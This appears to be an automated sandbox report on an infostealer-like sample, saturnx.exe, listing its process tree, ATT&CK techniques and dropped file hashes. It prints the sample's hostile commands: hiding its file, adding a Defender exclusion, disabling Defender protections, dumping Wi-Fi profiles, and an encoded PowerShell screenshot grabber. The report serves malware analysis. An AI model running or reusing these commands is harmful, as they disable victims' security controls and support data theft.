PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe
PID 1576 wrote to memory of 2628	1576	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

1192 attrib.exe
4088 attrib.exe
60 attrib.exe
1756 attrib.exe

pid	process
1192	attrib.exe
4088	attrib.exe
60	attrib.exe
1756	attrib.exe

C:\Users\Admin\AppData\Local\Temp\saturnx.exe
"C:\Users\Admin\AppData\Local\Temp\saturnx.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\saturnx.exe
  2⤵
  - Views/modifies file attributes
  PID:4088
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:60
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1136
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:3208
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:3620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\saturnx.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3484
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3032
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:3612
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:4844
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1756
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1192
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yn4cdwq1\yn4cdwq1.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3976
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6F83.tmp" "c:\Users\Admin\AppData\Local\Temp\yn4cdwq1\CSC34893D4A1DC7430399A4CA364BF9B073.TMP"
      4⤵
      PID:944

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa57dccc40,0x7ffa57dccc4c,0x7ffa57dccc58
  2⤵
  PID:1392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1828 /prefetch:2
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2184,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  PID:3032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2300 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3688,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4608 /prefetch:1
  2⤵
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4572,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:2656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4040,i,12964690984201002204,8173004502639986959,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5248 /prefetch:1
  2⤵
  PID:1164

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4452

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4832

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\340f5518-a0ba-47e8-bbe7-c6e6fbd815d1.tmp

Filesize
9KB

MD5
c064ae51f521c5ab0205bbb15d71abc7

SHA1
b6a02d21b18e00e11531a8c2be7772975881bd98

SHA256
693515b44242ff1d863c1983993beb9f2883805bb44ef330a5b18277677608b1

SHA512
8700fc6e63591a33916e6ac21203404d178128e74b492a4ea72d731aedc94480c6eef0a67e629754ac97b57cf1f08bbf20c1539f576a74eea86e09649755ff67

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3ec883a019080a250511b20c818b79f7

SHA1
6e3fa1206f5aa6e62a4405860bca125de1b7696b

SHA256
54777f122c50f472170d7889be8e66be59986cb9d25b64074012867eef693b3a

SHA512
703fda29bb6d07a36e7e279dc7cfbcfc1f86bb33f8b9f762a4b6df0b63e0fe6b7781cbae1e7bf8e90f763ee6af5f1fcc004c0c04cf818ba4e41c05e8cea5aca1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
210KB

MD5
48d2860dd3168b6f06a4f27c6791bcaa

SHA1
f5f803efed91cd45a36c3d6acdffaaf0e863bf8c

SHA256
04d7bf7a6586ef00516bdb3f7b96c65e0b9c6b940f4b145121ed00f6116bbb77

SHA512
172da615b5b97a0c17f80ddd8d7406e278cd26afd1eb45a052cde0cb55b92febe49773b1e02cf9e9adca2f34abbaa6d7b83eaad4e08c828ef4bf26f23b95584e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
a3e907c67f874306aa06f81b97a791ce

SHA1
34d5d342163dbbd142c996d3c87a070f93ff6cca

SHA256
b25984c2d668c884816ff696985e4a40161e9ab34d72aa73f8ccc3c6104b690a

SHA512
9c760c73786b4405a45adcdd677e14c4b2c29655c539fa1c05388de927be39558cf1b6eafd34c278523496f9d1f70fda6c159bca86665728941b82ec3f6293eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
d1d62c02078e4b15a755a81bae98319f

SHA1
f691e240a2c63cff118cdc1976e5a6d7e4dccf42

SHA256
4ff494cb7971d8f81078b94ae15932ce7f25c4d84482006e030fb77b30d6c63a

SHA512
e0303a46ceaed24ab785f31add72d3ae598a8d5bfefad85233bf68519c733a717ea9df1d69f6a8f975b615495f2f307e817a7f90259a249f5d891db0102e59f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
60e059940de76ebb0f7f252fe137ae1f

SHA1
10c855bf05ec03ef163446665d59218a6d366218

SHA256
70bd66ec5925c449680881506589cddaef9207b6a7691f8543147d30380d355e

SHA512
723c98174f70605fcb874540f8aa46e83507fac9e570b84963463721d7df9fd0d291c916a488844938fca8616f61ed711bcac9e1635dfd0786b7bd9f05b152b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
d592f79d6a3993d8d98717a613e06502

SHA1
a4bc4c08fa2c1c7f8e3b9de75120d1bea1ac8030

SHA256
cd9058b41d087caf02cda4fd2c8a4b805fcd6a84a8bf2ff1107c619f7b1d271d

SHA512
1e07ec2b2a7036101addeffcbbd6820fe4357ed986aae80697dc8785368fb70000edf46c701ae6677dcbfc9d8a0b17cf6dcc97d14397e05979a5cf1dbf0cb1c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
d31ef0c6065404ca835786ed2fcdd88a

SHA1
84269f81c0e1730ddece98a0f82ddac869903a61

SHA256
5fc47f512fdbde375b15c05b4b384b46ca8b5fddc7195dde61746392c5fa9f5b

SHA512
e66619bf55968aacd7e6be38a2193611aa4314491db4f4edf54802fac08187537cf01d6778f4b31557be5585b7abe89284ac2f65fefdcaf21af31012e544cdff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
983d863a521b5759c1dff2dab92811a2

SHA1
0c8e97c5fb427ce9ef1df0f853c3142bb59e7796

SHA256
d157d6f00953c95ad37b24c56b21fdb5396e33a1694632ff9e06df180f318fd7

SHA512
9f690f6fdc06ebb9f652f454cd9b04bcb8c58ca5360f68e01756427ef2d5b3f9b39bc09e0ba241345ac0b88b013094396303d89857437211429d48fbbaaa4a07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
800f68674eeced1fc5873a182fbfbd5f

SHA1
e778b3c64614e009edb3408811f4f58fa20b2a23

SHA256
579f9c7903da6173e0562924addc182ebc9981c462fa54b5ac747657c8c6e58a

SHA512
7f307b4c93fd246b3e39c864ac037fad1d823f89a8df286ef5d0b0b38666db063f0776d88328783aae1b03fb2a815026be087c8a161a7dd7f330ae7351f9a794

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
59d4873ec7f0990cc10a0f912d5c6fbd

SHA1
93ecfe9e55c876848fc8692af792f6f0608841e8

SHA256
f3cb7d69d19e1ea308f66961f30da0956665c8c9f7f142653f922c00ce1301ab

SHA512
fb63623851fc4e2a53f6037d6196652f242c5dcf9f8baefc720d364153ffddd9142514965ec7503e646b940e244591d0e536b452b7a49d70ab82a0c1239a8d6a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
10993e382a5812a18e02a55daa992bed

SHA1
46b10cd15a6c763a44995c84e8fc4911d7365fdc

SHA256
6c8d730a8f5dfda95b77b6fc3cec8265fa46a602cc3dcaa9a259ef5db88822cb

SHA512
113bb3f7728d600a5190d0e354866f3bd8df0b4b8a59e1e00d1dfbafa10356eaaf64c57f21dc8a05db9e603947e8b9f631e39f13bd5cb846cc9b44968ea14360

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
29aef73faf2da7cd0935557273f69377

SHA1
4db057d5675adb91b88563800a398cadc7872fdd

SHA256
099d3469636ea93df952824503084c37da3368f00922936be2e6e10a63c685ec

SHA512
42d3f814850374b89cf58892e5b099591cebbe5da6199144f5b82ac2d5a35eb0459ead559ca91935f0f8ff95d8712526a36c932e44fae15330a5fc6c6af3690e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
90d5e4a056e0fcb526c8163d2863a48c

SHA1
e7bf0efdd6bc9909006af7d79d22f2781d2f6fe9

SHA256
896f3dbe46ae7e263658103b7249fca9be4f4496e978c95d04891c15dfd61ed4

SHA512
f9a783b03a9a59060f3021126d3fdb7a7f1e2a182d4d2c9e676acba030f8ddae777b5a10875b82b9b0b0bd94f5dfec53db9285dc150c5be4eba6124e3ef8123e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7d36d780a2f2603f3d2c8f59b0083715

SHA1
548c321a7fa189fbf8cb4a67b8a856ff55cd82c1

SHA256
cae2188245c4051befe770b83188182defab0bbedc97f57f1480b8e053f6b540

SHA512
33ed04a011ff1e1d76b655cba81d9f16bad2971fb82b8e5bc05bd0fe91c6d45cf59b713ccfdcf766cf311263381a01fffbc0864cf9f38c4824dbff034f14bce3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
3fd8b730afce7a73e6cec4a0f5cf5f03

SHA1
2f319c8c06291c73e580377f85b4ecec5b3c6da5

SHA256
f285f61049662b31ab85d4833101ddd86b556fa0f8555cca5e6351a73c702950

SHA512
3b67faa1c56622e9e502356df5bccd74aeef9cbebbacffb7684433c68b0b94d15311d45de0d5bc12ae2e8ce663955e2560791fc7620c9cd7d0df799140b852d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
112a920b5f11cca42f413664782e7615

SHA1
f298434c6b3f87d872185e9e28d3c6c579301520

SHA256
5ef1302b0f94df486d8ad2a1c82b7c0a9926f494ca9b50965b9a8f7f0c80c672

SHA512
16f20a44113c3936f84c2c024e191c1c5b3d26dea5f7f90ad9350945bce7247f79ad08ebae3fa40b82957b28728b8129ab6f3d88a879f6aeb864ba02cc15ff05

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
193KB

MD5
271b1890bfb63edc5eb73ef44828d155

SHA1
b23ae7b0bd7e514e78de693c8377b7d76cd46672

SHA256
e7f1ac8da0de921bc08bce69700e371acc8e361688d4180508e730df373e77d2

SHA512
2330359e57cc61d71f6666997ebc6bda561b069bbd361e76b8a29c57ee3b9909466070c0549923780626ecad35f7628e795eb0b501fdb72bff7852a5db1fe1e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0256bd284691ed0fc502ef3c8a7e58dc

SHA1
dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

SHA256
e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

SHA512
